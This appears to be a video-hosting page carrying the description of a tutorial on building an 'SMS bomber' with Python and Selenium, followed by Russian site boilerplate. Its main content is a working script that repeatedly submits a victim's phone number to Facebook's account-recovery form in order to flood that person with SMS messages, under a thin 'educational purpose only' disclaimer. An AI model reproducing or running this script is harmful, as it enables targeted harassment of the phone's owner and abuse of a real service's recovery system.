RUVIDEO
Поделитесь видео 🙏

How to Create SMS Bomb using Selenium and Python | Educational Video | Mohitpy[M Tech-G]

Link for Download web browser:
https://chromedriver.chromium.org/downloads

Article Link
https://techycodes.tech/create-sms-bomb-using-selenium-and-python/

Making of SMS Bomber using Selenium and Python:


Here, we are going to learn a simple SMS bomber trick (for fun and educational purpose).
Selenium is a free tool for automated testing across different browsers.
In this video, we will learn to send automatically number of spam SMS for given number of frequency and interval.
Requirement:
You need to install chromedriver , pycharm and set path.
These are the steps:
• First go to Facebook Recover website.
• Then click on inspect element by pressing ctrl + shift + i or going in setting of browser and clicking on inspect element manually.
• Then find the class name of “enter No” input field .

Note: This Video is for educational purpose only, please don’t use it for disturbing anyone or any unethical way and I’m not responsible for what you do by this.

Code:

from selenium import webdriver
import time
browser = webdriver.Chrome('chromedriver.exe')
for x in range(20):
browser.get('https://www.facebook.com/login/identify/?ctx=recover')
number = browser.find_element_by_xpath('//*[@id="identify_email"]')
did_submit = browser.find_element_by_name('did_submit')
number.send_keys('xxxxxxxxxxxx)
did_submit.click()
time.sleep(3)
submit = browser.find_element_by_xpath('//*[@id="initiate_interstitial"]/div[2]/div/div[1]/button')
submit.click()
time.sleep(3)

About Me:

Coder Mohit is a Best place Where You can find All Python Related Content Like - Python Course, Programs, Codes and Projects & All Tech Articles.

Here we will provide you only interesting content, which you will like very much.

We hope you enjoy our Content as much as we enjoy offering them to you.

I will keep posting more important posts on my Website & YouTube Channel for all of you.
Please give your support and love.
Thanks For Being with us.

If You have any Doubt, Please feel free to contact us on our email and comment down below on our videos about your problem, We will resolve it as Soon as Possible.

Follow Me :
Instagram:
https://www.instagram.com/itz_mohit.goyal

Facebook:
https://www.facebook.com/mohit11082000

Twitter:
https://twitter.com/MohitG1108

My Website - Coder Mohit
https://codermohit.com

Что делает видео по-настоящему запоминающимся? Наверное, та самая атмосфера, которая заставляет забыть о времени. Когда вы заходите на RUVIDEO, чтобы посмотреть онлайн «How to Create SMS Bomb using Selenium and Python | Educational Video | Mohitpy[M Tech-G]», вы рассчитываете на нечто большее, чем просто загрузку плеера. И мы это понимаем. Контент такого уровня заслуживает того, чтобы его смотрели в HD 1080, без дрожания картинки и бесконечного буферизации.

Честно говоря, Rutube сегодня — это кладезь уникальных находок, которые часто теряются в общем шуме. Мы же вытаскиваем на поверхность самое интересное. Будь то динамичный экшн, глубокий разбор темы от любимого автора или просто уютное видео для настроения — всё это доступно здесь бесплатно и без лишних формальностей. Никаких «заполните анкету, чтобы продолжить». Только вы, ваш экран и качественный поток.

Если вас зацепило это видео, не забудьте взглянуть на похожие материалы в блоке справа. Мы откалибровали наши алгоритмы так, чтобы они подбирали контент не просто «по тегам», а по настроению и смыслу. Ведь в конечном итоге, онлайн-кинотеатр — это не склад файлов, а место, где каждый вечер можно найти свою историю. Приятного вам отдыха на RUVIDEO!

Видео взято из открытых источников Rutube. Если вы правообладатель, обратитесь к первоисточнику.